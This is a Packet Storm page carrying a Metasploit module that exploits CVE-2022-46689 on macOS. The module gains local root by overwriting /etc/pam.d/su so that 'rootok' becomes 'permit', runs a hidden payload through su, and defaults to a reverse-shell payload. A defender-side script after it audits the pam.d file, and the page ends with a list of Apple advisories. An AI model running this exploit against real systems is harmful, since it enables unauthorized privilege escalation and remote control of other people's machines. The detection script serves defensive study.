
macOS Dirty Cow Arbitrary File Write Local Privilege Escalation

Dirty Cow arbitrary file write local privilege escalation exploit for macOS.

Packet Storm
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'macOS Dirty Cow Arbitrary File Write Local Privilege Escalation',
        'Description' => %q{
          An app may be able to execute arbitrary code with kernel privileges
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Ian Beer', # discovery
          'Zhuowei Zhang', # proof of concept
          'timwr' # metasploit integration
        ],
        'References' => [
          ['CVE', '2022-46689'],
          ['URL', 'https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.61.2/tests/vm/vm_unaligned_copy_switch_race.c'],
          ['URL', 'https://github.com/zhuowei/MacDirtyCowDemo'],
        ],
        'Platform' => 'osx',
        'Arch' => ARCH_X64,
        'SessionTypes' => ['shell', 'meterpreter'],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' },
        'Targets' => [
          [ 'Mac OS X x64 (Native Payload)', {} ],
        ],
        'DisclosureDate' => '2022-12-17',
        'Notes' => {
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES],
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE]
        }
      )
    )
    register_advanced_options [
      OptString.new('TargetFile', [ true, 'The pam.d file to overwrite', '/etc/pam.d/su' ]),
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  def check
    version = Rex::Version.new(get_system_version)
    if version > Rex::Version.new('13.0.1')
      CheckCode::Safe
    elsif version < Rex::Version.new('13.0') && version > Rex::Version.new('12.6.1')
      CheckCode::Safe
    elsif version < Rex::Version.new('10.15')
      CheckCode::Safe
    else
      CheckCode::Appears
    end
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    payload_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    upload_and_chmodx payload_file, binary_payload
    register_file_for_cleanup payload_file

    target_file = datastore['TargetFile']
    current_content = read_file(target_file)
    backup_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
    unless write_file(backup_file, current_content)
      fail_with Failure::BadConfig, "#{backup_file} is not writable"
    end
    register_file_for_cleanup backup_file

    replace_content = current_content.sub('rootok', 'permit')
    replace_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
    unless write_file(replace_file, replace_content)
      fail_with Failure::BadConfig, "#{replace_file} is not writable"
    end
    register_file_for_cleanup replace_file

    exploit_file = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric(5..10)}"
    exploit_exe = exploit_data 'CVE-2022-46689', 'exploit'
    upload_and_chmodx exploit_file, exploit_exe
    register_file_for_cleanup exploit_file

    exploit_cmd = "#{exploit_file} #{target_file} #{replace_file}"
    print_status("Executing exploit '#{exploit_cmd}'")
    result = cmd_exec(exploit_cmd)
    print_status("Exploit result:\n#{result}")

    su_cmd = "echo '#{payload_file} & disown' | su"
    print_status("Running cmd:\n#{su_cmd}")
    result = cmd_exec(su_cmd)
    unless result.blank?
      print_status("Command output:\n#{result}")
    end

    exploit_cmd = "#{exploit_file} #{target_file} #{backup_file}"
    print_status("Executing exploit (restoring) '#{exploit_cmd}'")
    result = cmd_exec(exploit_cmd)
    print_status("Exploit result:\n#{result}")
  end
end
```
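
For triage on the defender's side, the following added example (not part of the Metasploit module or the original page) mirrors the version ranges in the module's `check` method and audits the text of a pam.d `su` file for the `rootok` to `permit` substitution the module performs. The names `appears_vulnerable?`, `audit_pam_su` and `SAMPLE_SU` are hypothetical, and the sample file is constructed for illustration.

```ruby
# Added defender-side example; names and sample data are assumptions.

# Same ranges as the module's check method: true means "appears vulnerable".
def appears_vulnerable?(version_string)
  v = Gem::Version.new(version_string)
  return false if v > Gem::Version.new('13.0.1')
  return false if v < Gem::Version.new('13.0') && v > Gem::Version.new('12.6.1')
  return false if v < Gem::Version.new('10.15')
  true
end

# Audit the auth stack of a pam.d service file given as text.
# Handles plain "type control module [args]" lines only (an assumption;
# bracketed control values such as [success=ok ...] are not parsed).
def audit_pam_su(text)
  auth = text.lines.map(&:strip)
             .reject { |l| l.empty? || l.start_with?('#') }
             .map(&:split)
             .select { |f| f[0] == 'auth' && f.size >= 3 }
  modules = auth.map { |f| File.basename(f[2]) }

  findings = []
  # pam_permit.so always succeeds, so in the auth stack it lets any user pass.
  findings << 'pam_permit.so in auth stack' if modules.include?('pam_permit.so')
  # The module replaces pam_rootok.so, so its absence is a second signal.
  findings << 'pam_rootok.so missing from auth stack' unless modules.include?('pam_rootok.so')
  findings
end

# Constructed sample of a su PAM configuration (not copied from a real host).
SAMPLE_SU = <<~PAM
  # su: auth account session
  auth       sufficient     pam_rootok.so
  auth       required       pam_opendirectory.so
  account    required       pam_opendirectory.so no_check_shell
  session    required       pam_launchd.so
PAM

if __FILE__ == $PROGRAM_NAME
  path = ARGV[0] || '/etc/pam.d/su'
  text = File.exist?(path) ? File.read(path) : SAMPLE_SU
  puts audit_pam_su(text).empty? ? 'auth stack looks unmodified' : audit_pam_su(text)
end
```
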

Related news

Apple Security Advisory 2022-12-13-8

Apple Security Advisory 2022-12-13-8 - watchOS 9.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

Apple Security Advisory 2022-12-13-7

Apple Security Advisory 2022-12-13-7 - tvOS 16.2 addresses bypass, code execution, integer overflow, out of bounds write, spoofing, and use-after-free vulnerabilities.

Apple Security Advisory 2022-12-13-6

Apple Security Advisory 2022-12-13-6 - macOS Big Sur 11.7.2 addresses bypass, code execution, and integer overflow vulnerabilities.

Apple Security Advisory 2022-12-13-5

Apple Security Advisory 2022-12-13-5 - macOS Monterey 12.6.2 addresses bypass, code execution, and integer overflow vulnerabilities.

Apple Security Advisory 2022-12-13-4

Apple Security Advisory 2022-12-13-4 - macOS Ventura 13.1 addresses bypass, code execution, out of bounds access, out of bounds write, spoofing, and use-after-free vulnerabilities.

Apple Security Advisory 2022-12-13-2

Apple Security Advisory 2022-12-13-2 - iOS 15.7.2 and iPadOS 15.7.2 addresses bypass, code execution, integer overflow, out of bounds write, and spoofing vulnerabilities.

Apple Security Advisory 2022-12-13-1

Apple Security Advisory 2022-12-13-1 - iOS 16.2 and iPadOS 16.2 addresses bypass, code execution, out of bounds write, spoofing, and use-after-free vulnerabilities.

CVE-2022-46702: About the security content of iOS 16.2 and iPadOS 16.2

The issue was addressed with improved memory handling. This issue is fixed in iOS 16.2 and iPadOS 16.2. An app may be able to disclose kernel memory.

CVE-2022-46700: About the security content of iOS 15.7.2 and iPadOS 15.7.2

A memory corruption issue was addressed with improved input validation. This issue is fixed in Safari 16.2, tvOS 16.2, macOS Ventura 13.1, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. Processing maliciously crafted web content may lead to arbitrary code execution.

CVE-2022-46701: About the security content of macOS Ventura 13.1

The issue was addressed with improved bounds checks. This issue is fixed in iOS 16.2 and iPadOS 16.2, macOS Ventura 13.1, tvOS 16.2. Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges.
